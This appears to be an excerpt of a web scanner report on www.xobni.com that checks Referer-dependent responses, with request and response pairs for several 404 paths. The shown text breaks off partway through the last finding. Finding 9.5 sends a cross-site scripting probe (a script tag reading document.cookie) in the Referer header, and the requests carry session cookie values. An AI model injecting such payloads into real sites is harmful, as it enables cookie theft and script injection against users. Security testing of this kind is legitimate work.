The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

9.1. http://www.xobni.com/enterprise/contact previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/enterprise/contact

Request 1

GET /enterprise/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2F&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/enterprise/contact?lc=en'>English</a><a href='/enterprise/contact?lc=de'>Deutsch</a><a href='/enterprise/contact?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); r
...[SNIP]...

Request 2

GET /enterprise/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7730

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">..berblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerkl..rung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ..2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/enterprise/contact?lc=en'>English</a><a href='/enterprise/contact?lc=de'>Deutsch</a><a href='/enterprise/contact?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); return false;" id="menu_produc
...[SNIP]...

9.2. http://www.xobni.com/fr-fr/account. previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/fr-fr/account.

Request 1

GET /fr-fr/account. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7923

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flegal%2Ftos&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/account.?lc=en'>English</a><a href='/fr-fr/account.?lc=de'>Deutsch</a><a href='/fr-fr/account.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordC
...[SNIP]...

Request 2

GET /fr-fr/account. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/account.?lc=en'>English</a><a href='/fr-fr/account.?lc=de'>Deutsch</a><a href='/fr-fr/account.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/pr
...[SNIP]...

9.3. http://www.xobni.com/fr-fr/legal/privacy. previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/fr-fr/legal/privacy.

Request 1

GET /fr-fr/legal/privacy. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7941

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flegal%2Ftos&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/privacy.?lc=en'>English</a><a href='/fr-fr/legal/privacy.?lc=de'>Deutsch</a><a href='/fr-fr/legal/privacy.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/"
...[SNIP]...

Request 2

GET /fr-fr/legal/privacy. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7901

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/privacy.?lc=en'>English</a><a href='/fr-fr/legal/privacy.?lc=de'>Deutsch</a><a href='/fr-fr/legal/privacy.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'cli
...[SNIP]...

9.4. http://www.xobni.com/fr-fr/legal/tos. previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/fr-fr/legal/tos.

Request 1

GET /fr-fr/legal/tos. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/tos
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7929

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Flegal%2Ftos&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/tos.?lc=en'>English</a><a href='/fr-fr/legal/tos.?lc=de'>Deutsch</a><a href='/fr-fr/legal/tos.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="r
...[SNIP]...

Request 2

GET /fr-fr/legal/tos. HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:15:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Information sur la compagnie</h3>
       <ul>
           <li><a href="/about">A propos</a></li>
           <li><a href="/press">Nouveaut..s</a></li>
           <li><a href="/about/jobs">Emplois</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Contact</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Etre partenaire avec Xobni</h3>
       <ul>
           <li><a href="/partners">Vue d'ensemble</a></li>
           <li><a href="/partners/partners_content">Information partenaires</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>L..gal</h3>
       <ul>
           <li><a href="/legal/trademarks">Marque d..pos..e</a></li>
           <li><a href="/legal/privacy">Politique de confidentialit..</a></li>
           <li><a href="/legal/license">EULA</a></li>
           <li><a href="/legal/tos">Conditions d'utilisation</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Langue: <span>Francais</span></span><br /><br />
       Droit d'auteur ....2006-2010 Xobni Corporation.<br />
       Tous droits r..serv..s<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/fr-fr/legal/tos.?lc=en'>English</a><a href='/fr-fr/legal/tos.?lc=de'>Deutsch</a><a href='/fr-fr/legal/tos.?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homep
...[SNIP]...

9.5. http://www.xobni.com/homepage/productmenu/free previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/homepage/productmenu/free

Request 1

GET /homepage/productmenu/free HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7871

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2Fmobile81ff6%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Effa1c61d19d&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>

           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
